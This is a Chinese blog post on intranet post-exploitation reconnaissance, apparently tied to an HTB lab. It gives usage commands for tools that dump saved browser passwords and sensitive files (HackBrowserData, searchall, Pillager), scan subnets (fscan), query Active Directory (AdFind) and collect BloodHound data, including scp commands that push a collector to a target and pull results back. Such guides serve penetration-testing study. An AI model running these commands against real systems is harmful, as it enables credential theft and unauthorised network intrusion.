下面所用的软件我已放在网盘
链接:https://pan.quark.cn/s/2a9e2b6f7471
也可以直接在公众号夜风Sec
内回复信息收集
获取
针对本机的信息收集
内网:各种角色( 个人用机、web
服务、数据库服务器 )
针对内网个人用机的角色较多 -> 账号密码存储
-
浏览器自动存储、 -
自己创建文件记录 -
某些工具自动存储
1、HackBrowserData 快速获取浏览器的账户密码
-
安装
Github
项目地址:https://github.com/moonD4rk/HackBrowserData
-
基本使用
.hack-browser-data.exe # 可以是管理员身份运行.hack-browser-data.exe -b all -f json --dir results --zip # 以json格式输出结果, 并压缩为zip
2、searchall 快速搜索服务器中有关敏感信息和浏览器的账户密码
-
安装
Github
项目地址:https://github.com/Naturehi666/searchall
-
基本使用
使用手册:https://github.com/Naturehi666/searchall/blob/main3.5.6/%E4%BD%BF%E7%94%A8%E8%AF%B4%E6%98%8E.md
.searchall64.exe search -p <指定路径>.searchall64.exe browser -b all # 对全部浏览器进行搜索 最好是管理员身份运行
3、Pillager 后渗透期间的信息收集工具,可以收集目标机器上的敏感信息
-
安装
Github
项目地址:https://github.com/qwqdanchun/Pillager
-
使用
# 很强大 很自动化 直接运行即可.Pillager.exe
结果位于%Temp%Pillager.zip
对外打点扫描类
1、Fscan 内网综合扫描工具,方便一键自动化、全方位漏扫扫描
-
安装
Github
项目地址:https://github.com/shadow1ng/fscan
-
基本使用
fscan.exe -h 192.168.47.0/24 # 默认使用全部模块
2、Template 启发式内网扫描
-
安装
Github
项目地址:https://github.com/1n7erface/Template
-
基本使用
.App-amd64-noupx.exe -i 192.168.47.0/24
AD
域环境分析类
1、Adfind 在域环境下非常强大的信息搜集工具
使用手册
-
安装
官网地址:https://www.joeware.net/freetools/tools/adfind/
-
域控查询:
Adfind.exe -sc dclistAdfind.exe -schema -s base objectversion
-
域用户查询
Adfind.exe -users nameAdfind.exe -sc u:webadmin
-
域用户组查询
Adfind.exe -f "objectClass=group"Adfind.exe -f "objectClass=group" -dn
-
查询域中计算机信息
Adfind.exe -f "objectClass=computer"Adfind.exe -f "objectClass=computer" dn
-
查询所有 GPO
Adfind.exe -sc gpodmp
2、BloodHound 可视化图形分析域环境中的关系的工具
-
安装
HloodHound项目地址
:https://github.com/SpecterOps/BloodHound-Legacy/releases
SharpHound项目地址
:https://github.com/SpecterOps/SharpHound/releases
# neo4jsudo apt-get install neo4j# 启动sudo neo4j start# 第一次使用需要设置一下账号密码 默认是 neo4j neo4jhttp://localhost:7474 # 访问该网址进行设置# 然后就是下载bloodhound 安装 -> 跟下面这个网址走就行https://bloodhound.specterops.io/get-started/quickstart/community-edition-quickstart# 下载 SharpHound.exe 收集工具.SharpHound.exe -c All --OutputDirectory C:Temp # 被控机上运行 -> 生成zip文件# 上传 SharpHound.exe 到目标机器 scp命令scp -o GSSAPIAuthentication=yes ~/桌面/privilege/bloodhoundcollect/SharpHound.exe [email protected]:C:/Users/f.frizzle/Desktop# 得到zip结果之后回传回来scp [email protected]:C:/Temp/20250405190945_BloodHound.zip /home/yefeng/桌面/HTB/TheFrizz# 启动bloodhound -> 导入zip文件 -> 分析./bloodhound
注意:
SharpHound 和 BloodHound 的版本要相互兼容
我提供的安装包是 SharpHound3 BloodHound4.0.3 彼此是兼容的
注意: 本文仅用于网络安全知识的学习与交流,应严格遵守相关法律法规和道德准则,不得用于非法入侵、破坏、窃取信息等任何违法违规行为。因使用本文内容而导致的任何直接或间接的损失,我均不承担任何责任。
原文始发于微信公众号(夜风Sec):初探内网【信息收集】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论